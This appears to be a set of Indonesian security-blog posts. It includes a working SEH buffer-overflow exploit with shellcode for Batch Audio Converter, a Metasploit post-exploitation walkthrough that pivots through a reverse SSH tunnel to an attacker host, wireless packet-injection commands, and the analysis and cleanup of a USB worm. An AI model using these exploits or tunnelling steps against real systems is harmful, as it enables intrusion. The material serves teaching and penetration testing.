OWASP ModSecurity Core Ruleset

ModSecurity is a good starting point to secure your web site. OWASP provides the core rule set (CRS) for ModSecurity rules against the most critical web application attack.

From OWASP:

ModSecurity is an Apache web server module that provides a web application firewall engine. The ModSecurity Rules Language engine is extrememly flexible and robust and has been referred to as the “Swiss Army Knife of web application firewalls.”

In order to enable users to take full advantage of ModSecurity out of the box, we have developed the Core Rule Set (CRS) which provides critical protections against attacks across most every web architecture.

Check OWASP Core Rule Set home page for more info.

Download here

Batch Audio Converter <=v.1.0.0 Stack Overflow (SEH)

Iseng-iseng nyari aplikasi yang bisa diotak-atik buat maenan SEH, dapet juga aplikasi Batch Audio Converter <= v.0.4.0.0 dan berhasil di eksploitasi dengan sukses melalui SEH Overflow (tulisan mengenai SEH secara jelas bisa dilihat di situs Peter Van Eeckhoutte dan situs underground Indonesia tertua, Kecoak Elektronik). Ngeliat versi dari aplikasinya, saya liat di Help/About pada aplikasi tersebut dan mengunjungi situs pembuatnya. Pembuatnya adalah Freewaretoolbox, langsung aja saya download versi terakhir, yaitu versi 1.0.0 dan ternyata masih kena juga dengan buffer overflow.

Saya langsung kirim email ke pembuatnya untuk segera diperbaiki karena kalau dilihat, aplikasi ini sangat umum dipakai karena beberapa dari pengguna internet sering melakukan konversi dari format mp3 ke format wav atau ke format yang lain.

Secara umum, tehnik eksploitasi ini digolongkan sebagai Local Exploit yang berujung pada Client-side Attack karena membutuhkan pihak ketiga (klien) untuk berhasil mengeksploitasi. Berikut adalah penggalan Proof of Concept (PoC) yang saya lakukan terhadap aplikasi tersebut.

#!/usr/bin/python#
# PoC for the Batch Audio Converter .wav crash
# SEH 41414141
# nSEH 41414141
# EIP 41414141
#
junk = &quot;A&quot; * 5000
f = open(&#039;lagu.wav&#039;, &#039;w&#039;)
f.write(junk)
f.close()

Script diatas akan membuat file lagu.wav yang berisi karakter A sebanyak 5000 bytes, bukalah dengan Batch Audio Converter, maka aplikasi tersebut akan tertutup (baca: crash). Keseluruhan proses eksploitasi membutuhkan pengetahuan tentang basic buffer overflow dan tehnik overflow di SEH. Berikut hasil kode PoC eksploit yang berhasil menjalankan calc.exe.

#!/usr/bin/python

import struct

junk = &quot;A&quot; * 4132
nseh = &quot;\xeb\x06\x90\x90&quot;
seh = struct.pack(&#039;&lt;L&#039;, 0x10029bb7) # pop edi pop esi ret from lame_enc.dll
nop = &quot;\x90&quot; * 30
print &quot;[+] Preparing for file..&quot;
# windows/exec, CMD=calc.exe, EXITFUNC=seh
# 463 bytes, x86/alpha_mixed
shellcode = (&quot;\x89\xe3\xdb\xc6\xd9\x73\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a\x4a&quot;
&quot;\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59\x6a\x41&quot;
&quot;\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42&quot;
&quot;\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49&quot;
&quot;\x6c\x49\x78\x4d\x59\x47\x70\x45\x50\x45\x50\x43\x50\x4c\x49&quot;
&quot;\x48\x65\x45\x61\x4e\x32\x42\x44\x4e\x6b\x50\x52\x44\x70\x4c&quot;
&quot;\x4b\x50\x52\x44\x4c\x4e\x6b\x42\x72\x45\x44\x4c\x4b\x43\x42&quot;
&quot;\x46\x48\x44\x4f\x4d\x67\x51\x5a\x46\x46\x44\x71\x4b\x4f\x44&quot;
&quot;\x71\x49\x50\x4e\x4c\x47\x4c\x51\x71\x51\x6c\x43\x32\x46\x4c&quot;
&quot;\x51\x30\x49\x51\x48\x4f\x46\x6d\x45\x51\x49\x57\x4d\x32\x48&quot;
&quot;\x70\x50\x52\x42\x77\x4c\x4b\x46\x32\x44\x50\x4c\x4b\x43\x72&quot;
&quot;\x47\x4c\x47\x71\x4e\x30\x4c\x4b\x47\x30\x51\x68\x4f\x75\x4f&quot;
&quot;\x30\x42\x54\x42\x6a\x46\x61\x4a\x70\x46\x30\x4c\x4b\x43\x78&quot;
&quot;\x46\x78\x4e\x6b\x43\x68\x47\x50\x45\x51\x4b\x63\x4b\x53\x47&quot;
&quot;\x4c\x47\x39\x4e\x6b\x47\x44\x4e\x6b\x46\x61\x48\x56\x50\x31&quot;
&quot;\x49\x6f\x50\x31\x4f\x30\x4c\x6c\x4b\x71\x4a\x6f\x44\x4d\x46&quot;
&quot;\x61\x48\x47\x46\x58\x4d\x30\x44\x35\x49\x64\x43\x33\x43\x4d&quot;
&quot;\x48\x78\x47\x4b\x51\x6d\x47\x54\x51\x65\x4b\x52\x43\x68\x4e&quot;
&quot;\x6b\x46\x38\x47\x54\x47\x71\x4e\x33\x43\x56\x4e\x6b\x46\x6c&quot;
&quot;\x50\x4b\x4c\x4b\x50\x58\x45\x4c\x46\x61\x4b\x63\x4e\x6b\x47&quot;
&quot;\x74\x4c\x4b\x43\x31\x4a\x70\x4c\x49\x42\x64\x44\x64\x46\x44&quot;
&quot;\x51\x4b\x51\x4b\x43\x51\x46\x39\x50\x5a\x42\x71\x4b\x4f\x4b&quot;
&quot;\x50\x46\x38\x51\x4f\x50\x5a\x4e\x6b\x45\x42\x48\x6b\x4c\x46&quot;
&quot;\x51\x4d\x51\x7a\x46\x61\x4c\x4d\x4f\x75\x4f\x49\x47\x70\x43&quot;
&quot;\x30\x43\x30\x46\x30\x42\x48\x50\x31\x4e\x6b\x50\x6f\x4d\x57&quot;
&quot;\x49\x6f\x4b\x65\x4f\x4b\x4b\x4e\x46\x6e\x50\x32\x49\x7a\x43&quot;
&quot;\x58\x4c\x66\x4f\x65\x4f\x4d\x4f\x6d\x4b\x4f\x48\x55\x47\x4c&quot;
&quot;\x47\x76\x51\x6c\x45\x5a\x4d\x50\x4b\x4b\x4d\x30\x44\x35\x43&quot;
&quot;\x35\x4d\x6b\x47\x37\x45\x43\x42\x52\x50\x6f\x51\x7a\x45\x50&quot;
&quot;\x51\x43\x49\x6f\x4b\x65\x43\x53\x45\x31\x42\x4c\x43\x53\x46&quot;
&quot;\x4e\x45\x35\x51\x68\x42\x45\x43\x30\x45\x5a\x41\x41&quot;)

f = open(&#039;exploit.wav&#039;, &#039;w&#039;)
print &quot;[+] Writing vulnerable WAV file..&quot;
f.write(junk+nseh+seh+nop+shellcode)
f.close()
print &quot;[+] Success writing file..&quot;

EDB-ID: 13909
CVE: 2010-2348
OSVDB-ID: 65639
Published: 2010-06-17
Mungkin kapan-kapan kalau saya sempat saya tuliskan bagaimana proses pembuatannya, sekalian nanti (lagi-lagi kalau sempat) juga buat cara konversi ke Metasploit, cara fuzzing, exploit dengan kondisi direct RET, abusing SEH and gain EIP, dan bypass ASLR dan DEP di Windows versi terbaru.

Spesial thank’s to..

Oebaj – thx Pak, saya ga mungkin jadi “gini” kalo ga disuruh ngambil offsec 😉
Otoy – dapat juga lo bro, mantab!
Kilurah – kapan lanjutin lagi woy?!
slashr00t – semangat kawan2!

PHP Include Exploitation with Metasploit

Metasploit support for PHP Include exploitation, or simply known as RFI (Remote File Inclusion). I will show you how this work on CS-Cart 1.3.3 which vulnerable to remote file inclusion.

The vulnerable path is at classes/phpmailer/class.cs_phpmailer.php?classes_dir=[include arbitrary php code]

so in Metasploit, the PHPURI PATH will be like this:

classes/phpmailer/class.cs_phpmailer.php?classes_dir=XXpathXX

let see how this exploitation works.

More

Secure Browsing Dengan SSH Tunnel

Tehnik ini saya gunakan ketika memakai akses internet di area publik seperti Wireless Hotspot. Yup, secure browsing kali ini menggunakan SSH Tunnel. Tehnik yang menarik karena SSH bisa “ditebengin” dengan paket lain, sehingga paket yang “nebeng” protokol SSH juga ikut terenkripsi (SSH merupakan protokol yang aman karena tiap paket yang berjalan di enkripsi).

Ok basa-basi selesai, pertama kali yang harus disiapkan adalah sebuah server di internet yang bisa kita SSH (maksudnya, bisa kita remote dengan SSH) contohnya server VPS kita, atau mungkin server standalone milik sendiri di rumah (bisa pake Speedy, atau ISP lain yang menyediakan IP Public). Kali ini saya menggunakan server standalone yang ada di rumah dan sudah menjalankan SSH server. Kalau sudah, berikutnya bisa dipaparkan dalam bentuk step-by-step.

Kedua, silakan SSH server kita yang dengan perintah seperti berikut:

toms@bt:~$ ssh t0m@111.222.333.444 -D 8080
t0m's password:
Linux sucks 2.6.26-2-686 #1 SMP Tue Mar 9 17:35:51 UTC 2010 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

Last login: Fri Apr 23 11:50:00 2010 from 202.134.0.61
t0m@sucks:~$

Perhatikan perintah SSH yang saya gunakan, ada tambahan -D 8080 disana. -D 8080 berarti membuka port 8080 di sisi lokal (localhost) yang nantinya apabila ada paket yang melewati port 8080 di localhost tersebut akan ikut terenkripsi seperti halnya koneksi ke port 22 untuk SSH. Istilah gampangnya, apapun yang lewat port 8080 di localhost “ditebengin” ke port 22 yang notabene terenkripsi.

Sebelum ke tahap selanjutnya, coba browsing ke IP Chicken untuk melihat IP Address kita saat ini, tujuannya biar nanti kita tahu apakah tehnik ini berhasil atau tidak.

Tahap ketiga, konfigurasikan browser kita untuk menggunakan proxy socks5 dan arahkan ke 127.0.0.1 dan port 8080.

Ok klo udah, coba browse lagi ke IP Chicken dan lihat perbedaannya. Apabila IP address yang keluar adalah IP server SSH kita, berarti secure browsing lewat SSH Tunnel berhasil dilakukan.

Tehnik ini sangat berguna apabila kita mau mengakses website yang membutuhkan transaksi terhadap informasi sensitif menggunakan browser, seperti login ke email (kantor/pribadi), login ke social network website seperti Facebook, Twitter, ataupun melakukan transaksi di Paypal, eBay, Amazon.

Tehnik Tunneling Dalam Hacking

Tunneling biasanya dipakai sebagai tehnik untuk meloloskan paket dari jaringan yang terisolasi oleh firewall atau oleh jaringan itu sendiri (NAT). Para administrator jaringan biasanya membuat sebuah tunnel untuk dapat mengakses bagian yang tidak dapat diakses tersebut. Bayangkan jika Anda seorang administrator jaringan hendak melakukan remote connection ke jaringan Anda sendiri namun komputer yang hendak Anda remote berada di balik NAT / jaringan yang tidak di routing ke internet, bagaimana melakukannya? Tentu saja dengan tehnik tunneling.

Tehnik tunneling juga dipakai oleh pentester untuk mendukung pekerjaan penetration test. Mari kita lihat tehnik ini berjalan.
Sebagai seorang pentester, saya ditugaskan untuk menjebol sistem sampe tuntas, termasuk jaringan internal target. Singkat cerita, saya telah mendapatkan remote shell dari sebuah komputer yang hanya dapat diakses dari satu subnet jaringan. Setelah ditelusuri, komputer target membuka port 3389 yang artinya service Remote Desktop sedang berjalan dan siap diakses. Namun karena komputer target berada pada jaringan NAT, maka koneksi langsung ke port 3389 akan segera diblok oleh Gateway/Firewall. Saya mencoba koneksi reverse connect dengan netcat, namun yang menjadi penghalang, ternyata OUTBOUND rule pada firewall hanya memperbolehkan koneksi ke port 80 dan 443, selain itu di blok. Untuk itulah saya terpikir untuk menggunakan SSH Tunneling, sebuah server SSH saya siapkan untuk listening di port 80. OIya, saya menggunakan Backtrack untuk melakukan ini semua 🙂

Eksploitasi sukses dilakukan dengan Metasploit dengan sedikit metode Social engineering terhadap salah satu staff di perusahaan tersebut. Metasploit memberikan saya sebuah remote back shell meterpreter yang multifungsi.

msf exploit(ms06_001_wmf_setabortproc) &gt; exploit
[*] Exploit running as background job.
msf exploit(ms06_001_wmf_setabortproc) &gt;
[*] Started reverse handler on 203.128.250.15:4444
[*] Using URL: http://203.128.250.15:80/register.html
[*] Server started.
[*] Sending exploit to 203.128.250.15:51368...
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (203.128.250.15:4444 -&gt; 203.128.250.15:54652)
msf exploit(ms06_001_wmf_setabortproc) &gt; sessions -l
Active sessions
===============
  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  203.128.250.15:4444 -&gt; 203.128.250.15:54652
msf exploit(ms06_001_wmf_setabortproc) &gt; sessions -i 1
[*] Starting interaction with 1...
meterpreter &gt; getuid
Server username: ITUSR-54\admin
meterpreter &gt; use priv
Loading extension priv...success.
meterpreter &gt; getsystem
...got system (via technique 1).
meterpreter &gt; getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter &gt;

Setelah mendapatkan akses setara dengan SYSTEM, saya mengupload ssh client yang terdapat dalam paket Putty, yaitu plink.exe.

meterpreter &gt; upload /pentest/windows-binaries/tools/plink.exe C:\\windows\
[*] uploading  : /pentest/windows-binaries/tools/plink.exe -&gt; C:\\windows\
[*] uploaded   : /pentest/windows-binaries/tools/plink.exe -&gt; C:\windows\
meterpreter &gt;

Setelah itu saya mengakses shell pada target, dan mengeksekusi SSH client untuk segera membuat tunneling ke server SSH yang telah saya siapkan sebelumnya.

meterpreter &gt; execute -f cmd -c -H
Process 1776 created.
Channel 2 created.
meterpreter &gt; interact 2
Interacting with channel 2...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\admin\Desktop&gt;plink -P 80 -l root -pw toor -C -R 3389:127.0.0.1:3389 203.128.250.15
plink -P 80 -l root -pw toor -C -R 3389:127.0.0.1:3389 203.128.250.15
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's key fingerprint is:
ssh-rsa 2048 ce:bf:86:ed:50:68:bf:21:8f:c2:a9:63:9f:07:d5:0c
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
connection.
Store key in cache? (y/n) y
BackTrack 4 (PwnSauce) Penetration Testing and Auditing Distribution
Last login: Wed Feb 24 23:04:29 2010 from 10.5.5.243
root@bt:~#

Terlihat bahwa koneksi SSH telah terbentuk (pada port 80) antara target dengan komputer saya, ditandai dengan keluarnya shell Backtrack saya pada komputer target. Pada komputer saya, juga segera terbentuk port 3389 yang listening di 127.0.0.1 (localhost). Sampai saat ini, port 3389 service Remote Desktop komputer target telah berhasil di tunneling ke komputer saya dengan port yang sama, namun melewati koneksi SSH.

tom@bt:/$ rdesktop 127.0.0.1
Autoselected keyboard map en-us
WARNING: Remote desktop does not support colour depth 24; falling back to 16

Tehnik tunneling sangat berguna untuk berbagai keadaan, salah satunya adalah situasi diatas.

How-to: Backtrack 4 USB Persistent Changes

Here is my dirty way to make BT4 running on USB disk instead of run from DVD.

    1. Boot Live DVD Backtrack 4
    2. Split your pendrive into 2 partitions, the 1st is for your BT4 files, and the 2nd is for your changes. I have 4 GB pendrive, so i made 2 partitions with 1500MB for BT4 files (with FAT32 FS) and the rest of disk space went to another partition with Ext3 FS. You can use fdisk of cfdisk to make those things.
    3. Format it using mkfs:
      • mkfs.vfat -F 32 -n BT4 /dev/sdb1
      • mkfs.ext3 -b 4096 -L casper-rw /dev/sdb2
    4. Mount them:
      • mkdir /mnt/BT4
      • mount /dev/sdb1 /mnt/BT4
    5. Copy all BT4 files from mounted DVD to our new mounted partition (/mnt/BT4)
      • rsync -avh /media/cdrom/ /mnt/BT4/
    6. Instal GRUB boot loader
      • grub-install –no-floppy –root-directory=/mnt/BT4 /dev/sdb
    7. Edit the menu.lst file
      • nano /mnt/BT4/boot/grub/menu.lst
      • Start Persistent Live CD <———- find this line
      • bla bla bla quiet vga=0×317 <———- add vga=0×317 like this
    8. umount /mnt/BT4
    9. reboot

That’s it. Can’t wait for the official release ^^

Failed Injection Packet to AP

Pernah ketemu kasus seperti ini ketika lagi asik-asiknya menginjeksi paket di jaringan wireless?

Saving ARP requests in replay_arp-0123-104950.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Read 17915 packets (got 3 ARP requests), sent 5854 packets...

Yup, kasus tersebut terjadi karena alamat MAC korban tidak lagi berasosiasi dengan Access Point setempat atau bisa dibilang lagi putus-putus, entah akibat proses de-authentication yang kita buat sendiri atau memang sinyalnya ga bagus untuk sampai di laptop/pc korban. Nah, untuk menyiasatinya ada 3 cara:

  1. Ganti dengan alamat MAC korban yang lain.
  2. Pancing dengan 1 kartu jaringan wireless lain (musti ada 2 buah kartu jaringan)
  3. Bikin fake authentication ke AP

Untuk cara yang pertama cukup mudah, tinggal matikan proses aireplay-ng yang sedang berjalan, lalu ganti dengan alamat MAC korban yang tergabung dalam satu AP yang sama. Pada cara yang kedua, kita tinggal menghidupkan kartu jaringan yang kedua (biasanya PCMCIA/USB card) lalu kirimkan paket ke AP atau cukup dengan mengirimkan ping ke internet. Yang mau saya bahas disini adalah cara ketiga, yaitu dengan membuat fake authentication ke AP, caranya:

aireplay-ng -1 0 -e  -a  -h  wifi0
aireplay-ng -1 0 -e linksys -a 00:18:F8:E1:76:BD -h 00:0F:54:3C:65:93 wifi0
Kalau sukses akan terlihat seperti ini:
18:18:20  Sending Authentication Request
18:18:20  Authentication successful
18:18:20  Sending Association Request
18:18:20  Association successful :-)

Atau dengan cara lain untuk keep-alive packet injection seperti ini:

aireplay-ng -1 6000 -o 1 -q 10 -e linksys -a 00:18:F8:E1:76:BD
-h 00:0F:54:3C:65:93 wifi0

yang berarti:

  • 6000 – Melakukan re-autentikasi setiap 6000 detik.
  • -o 1 – Hanya mengirim satu paket untuk satu waktu.
  • -q 10 – Mengirim paket keep-alive setiap 10 detik.

hasilnya akan seperti ini:

18:22:32  Sending Authentication Request
18:22:32  Authentication successful
18:22:32  Sending Association Request
18:22:32  Association successful :-)
18:22:42  Sending keep-alive packet
18:22:52  Sending keep-alive packet
# dan seterusnya.

Selanjutnya kita bisa melanjutkan proses injeksi paket di jaringan wireless tersebut dengan santai ^^

USB Worm attack bagian II

Sesuai dengan janji saya pada bagian pertama, pada bagian kedua ini saya akan menjabarkan technical detail virus yang tergolong canggih ini. Baiklah, dimulai dari scanning flashdisk milik seorang teman, saya hapus semua yang terkait dengan virus ini namun saya karantina 1 file yang mengandung virus. File ini saya namakan sample_virus.exe. Untuk informasi, saya jabarkan sekalian proses infeksi pada flashdisk hingga kemudian bisa terinstall di komputer.

Scan Flashdisk

Seperti yang pernah saya utarakan, bahwa hanya 2 buah antivirus terkenal (kebetulan memang hanya ada 2 komputer yang terinstall 2 buah antivirus tersebut) yaitu Avast Antivirus dan Avira Antivir yang mendeteksi keberadaan virus ini pada sebuah flashdisk milik teman. Terdeteksi oleh Avast sebagai Win32:Trojan-gen {Other} dan oleh Antivir sebagai R/Crypt.PEPM.Gen, sedangkan oleh Ansav dikenal dengan nama W32/Sensus. Saya tidak langsung menghapus semua file virus dengan antivirus, namun saya menghapusnya secara manual. Berikut langkah-langkahnya:

  1. Buka command prompt
  2. Pindah ke drive letter milik flashdisk (misal F:), ketikkan F:
  3. Reset semua attribute file dan folder pada flashdisk, lakukan pada command prompt seperti berikut: F:>attrib -s -r -h /s /d
  4. Buka My Computer –> Search, tentukan tempat pencarian hanya pada flashdisk (drive F: saja), lalu masukkan query *.exe pada kolom pencarian. Hal ini untuk mencari file dengan ekstensi .exe. Pastikan File yang dihapus hanyalah file dengan icon Word Document.
  5. Yang saya lakukan berikutnya adalah mengambil satu contoh file virus dan mengurungnya dengan kompresi file (saya menggunakan 7zip) dan dipassword.
  6. Cek file autorun.inf, perhatikan path tempat virus bersemayam.
  7. Cek direktori RECYCLER\[subfolder] apakah ada file berekstensi .exe, kalau ada langsung hapus.
  8. Safe and Remove Hardware –> Cabut flashdisk.

Percobaan Install Virus

Virus yang barusan saya karantina akan dianalisa kerjanya, maka saya sengaja menjalankan virus tersebut pada sistem  Windows XP di VMware. Setelah diinstall, saya menjalankan Process Explorer dari SysInternals dan hasilnya menunjukkan bahwa virus menjalankan file-file berikut:

  • services.exe
  • WINWORD.exe

Semua proses ini akan menjadi janggal ketika saya tidak menginstall apa-apa pada sistem operasi Windows XP tersebut, karena memang masih fresh install. Yang mengejutkan, services.exe membawahi program ping.exe untuk melakukan ping ke http://www.putera.com sebanyak 30000 kali, hmm..DoS?

Dari ketiga proses tersebut, analisa dilanjutkan untuk mencari keberadaan ketiga file tersebut.

  • File services.exe terdapat pada direktori C:\>Program Files\mIRC\IRC Bot\
  • File WINWORD.EXE terdapat pada direktori C:\>Program Files\Microsoft Office\

Khusus file services.exe, direktori C:\>Program Files\mIRC\IRC Bot\ akan tidak terlihat, saya menggunakan metode attrib seperti sebelumnya untuk mengeluarkan direktori IRC Bot. Setelah mengetahui cara kerja virus, saya melakukan pemberangusan proses yang berjalan di belakang layar tersebut menggunakan Process Explorer. Dengan memilih Kill Process Tree pada ketiga proses, maka proses yang “nebeng” ketiga program tersebut ikut diberangus. Untuk sementara virus tidak berjalan, namun “sisa-sisa kotoran” virus ini masih ada di komputer kita.

Pembersihan

Sebelum dilakukan pembersihan, yang paling penting adalah mematikan System Restore. Pembersihan kali ini menggunakan program Autoruns keluaran SysInternals. Saya menjalankan program Autoruns dan mencari file-file yang dimaksud satu persatu pada tab-tab menu program Autoruns. Berikut adalah file-file yang harus dibuang dari list.

  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Acha.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AmyMastura.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrsz.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\registry.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe
  • Adobe Gamma Loader.com (pada menu Startup)

Sedangkan direktori tempat bersemayam virus-virus ini pun harus segera diberangus.

  • C:\>Program Files\mIRC\IRC Bot\*.*
  • C:\>Program Files\Microsoft Office\WINWORD.EXE
  • C:\>Documents and Settings\[user]\Start Menu\Programs\Startup\Adobe Gamma Loader.com

Untuk PC yang terinstall Microsoft Office, silakan copy file WINWORD.EXE dan CTFMON.EXE dari PC yang lain karena file sudah terinfeksi oleh virus tersebut.

Selanjutnya adalah pembersihan di Registry. Untuk mempermudah kerja kita, saya sarankan menggunakan plugin RegistryFX dari Ansav Antivirus, sangat powerful. Silakan download Ansav Antivirus. Setelah itu jalankan Ansav dan pilih Plugins –> RegistryFX, saya menjalankan sesuai pilihan yang sudah ada. Lalu pada Registry:

  • [HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    • Shell = “Explorer.exe, %ProgramFiles%\Microsoft Office\WINWORD.EXE”

Hapus value %ProgramFiles%\Microsoft Office\WINWORD.EXE, karena value ini yang selalu menjalankan WINWORD.EXE setelah sistem start. Lalu jalankan lagi fungsi Windows Defender, Automatic Updates, Windows Firewall, dan lainnya.

Demikian penjelasan detil teknis terhadap virus yang meresahkan kampus belakangan ini. Semoga bermanfaat.